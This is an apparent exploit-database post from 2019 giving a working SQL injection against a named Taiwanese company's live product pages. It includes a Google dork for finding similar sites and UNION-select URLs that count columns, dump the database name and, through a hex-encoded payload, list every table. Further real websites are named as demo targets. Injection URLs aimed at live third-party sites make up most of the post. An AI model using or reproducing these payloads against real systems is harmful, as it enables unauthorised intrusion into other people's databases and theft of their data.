CHUENG SHINE CO SQl Injection Vulnerability

2019.06.10
dz B14ck_Dz (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : SQL INJECTION Vulnerability # Author : B14ck_Dz { N00b *-* } # Tested On : Backbox (Linux) # Dork : inurl:"product.php?id=" [+] Vulnerable URL : http://www.cschair.com.tw/products.php?TypeID=[id]&CateID=&ID=[id] Let Us Try on This Vulnerable URL ===> [*] E.X : http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48 [!] Number of Columns : 16 ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48 order by 16 ) [!] Vulenrable Record : (9,10,11) ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ) [!] Dumping Database Name : ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,CONCAT_WS(0x203a20,DATABASE()),10,11,12,13,14,15,16 ) [!] Dumping All the Tables in the DATABASE Using {HACKBAR} : ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),10,11,12,13,14,15,16 ) [+] Demo : [*] http://www.cschair.com.tw/productsinfo.php?TypeID=5&CateID=&ID=93 [*] http://www.ampak.com.tw/product.php?id=21 [*] http://www.microtek.com/products.php?KindID=6&ID=1


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top